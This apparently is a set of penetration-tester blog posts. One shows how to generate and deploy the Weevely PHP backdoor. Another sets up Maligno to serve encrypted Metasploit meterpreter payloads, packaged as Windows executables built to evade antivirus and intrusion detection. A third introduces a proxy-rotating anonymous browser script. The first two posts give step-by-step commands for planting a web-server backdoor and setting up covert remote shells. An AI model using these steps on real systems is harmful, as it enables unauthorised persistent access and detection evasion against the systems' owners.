by Cornel on 27/02/2015
Recently I’ve been finding more and more that I need a reliable PHP backdoor shell with a reputable history. From work experience I knew about the classic c99.php backdoor shell and knew that it wasn’t the direction I wanted to go in. If you haven’t read The Hacker Blog article on it here, it’s definitely worth a read.
So I came across Weevely. What an awesome little backdoor! Here I’m just going to walk through its basic usage to get you up and running; it is definitely one of the easiest routes to go if you’re going to be uploading a backdoor anytime soon.
- Weevely comes built into Kali, so we can generate our backdoor with the password that will be used to connect to it. My password will be blagger.
weevely generate blagger sneaky.php
- Next, for simplicity’s sake, I will upload the backdoor to my test web server using SFTP. Of course there are hundreds of other ways to get your PHP script onto a web server, but this is a demo. Because my web server runs on Amazon’s EC2, I need to remote in using a limited user account. Still, I can upload the file to the tmp directory, to be moved by root.
- Finally, I’ll SSH in and move the uploaded backdoor into the public-facing web directory so that Weevely can connect to it. Once it’s publicly accessible, browse to it in Weevely and your backdoor gets executed!
weevely http://22.214.171.124/sneaky.php blagger
by Cornel on 2/07/2014
So I’ve decided I want to have my meterpreter sessions encrypted to avoid layer 4 detection. It’s something I’ve wanted in the past but never really pursued, until I came across Maligno. Maligno is a platform from which you can launch Metasploit payloads over HTTPS, AES encrypted and base64 encoded. The payload pushed to the client can also be encoded numerous times with any of the Metasploit encoders to avoid layer 7 detection.
This is the process of setting up your server:
- Download and extract Maligno.
- Install the prerequisite binaries:
sudo apt-get update && sudo apt-get install python-ipcalc
- Generate the self-signed SSL cert to be used on your server.
- Configure server.conf to allow the following:
  - Serve 3 different payloads to 3 different targets, all over port 443
  - Serve via HTTPS
  - Scope to your network
  - Set the server IP to that of the Maligno host
- Generate the Python scripts that the clients will use to reach out to Maligno:
python clientgen.py -i 0 -f server.conf -o client1.py
python clientgen.py -i 1 -f server.conf -o client2.py
python clientgen.py -i 2 -f server.conf -o client3.py
- On a Windows machine, install Python 2.7, pycrypto and py2exe.
- Generate executables from the Python scripts using py2exe for all 3 target clients.
- Start the Maligno server and the meterpreter handler to listen for incoming connections…
- Upon execution of your crafted executables, an encrypted meterpreter session will be opened undetected by antivirus or NIDS.
Enjoy responsibly. BYOB.
by Cornel on 22/01/2014
Fellow analysts, I give you my personal fully customized python-based anonymous browser, anonBrowser.py.
Nothing special, just a little terminal program that pulls a random proxy, emulates a random browser and pulls the specified content using its forged identity. Written so that it’s easy to understand and easy to customize should you like to make changes to it.
Usage: ./anonBrowser.py -s URL